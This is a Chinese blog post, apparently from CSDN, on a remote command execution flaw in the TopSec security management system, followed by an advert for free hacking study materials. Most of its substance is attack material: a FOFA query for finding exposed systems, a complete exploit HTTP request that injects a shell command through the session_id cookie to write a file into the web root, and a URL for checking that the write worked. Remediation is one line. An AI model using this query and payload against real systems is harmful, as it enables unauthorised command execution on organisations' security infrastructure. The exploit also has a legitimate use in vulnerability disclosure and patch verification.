天融信TOPSEC安全管理系统存在远程命令执行漏洞

文章目录

• *       * 产品简介
  

  • 漏洞概述
  • 指纹识别
  • 漏洞利用
  • 修复建议

产品简介

天融信TopSec
安全管理系统，是基于大数据架构，采用多种技术手段收集各类探针设备安全数据，围绕资产、漏洞、攻击、威胁等安全要素进行全面分析，提供统一监测告警、集中策略管控、协同处置流程，实现客户等保合规、资产统一管理、风险一键阻断等。

漏洞概述

安全管理系统存在存在远程命令执行漏洞，通过此漏洞，攻击者可进行文件写入等危险操作，威胁系统安全。

指纹识别

fofa:

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/43587da4787f4687bfa4b1b91df0ce9a.png)

漏洞利用

poc:

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 10
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: session_id_443=1|echo 'hhh' >> /www/htdocs/site/image/hhh.txt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/5ddfc923413145c9bb68c2d969c794a2.png)
验证url:

https://you_ip/site/image/hhh.txt

![在这里插入图片描述](https://img-
blog.csdnimg.cn/direct/3fda7f1a266f459abc557153657b219a.png)

修复建议

联系软件厂商更新至最新安全版本

【陆上行舟。】

学习计划安排

我一共划分了六个阶段，但并不是说你得学完全部才能上手工作，对于一些初级岗位，学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包，需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦，无偿分享！！！

如果你对网络安全入门感兴趣，那么你需要的话可以

点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析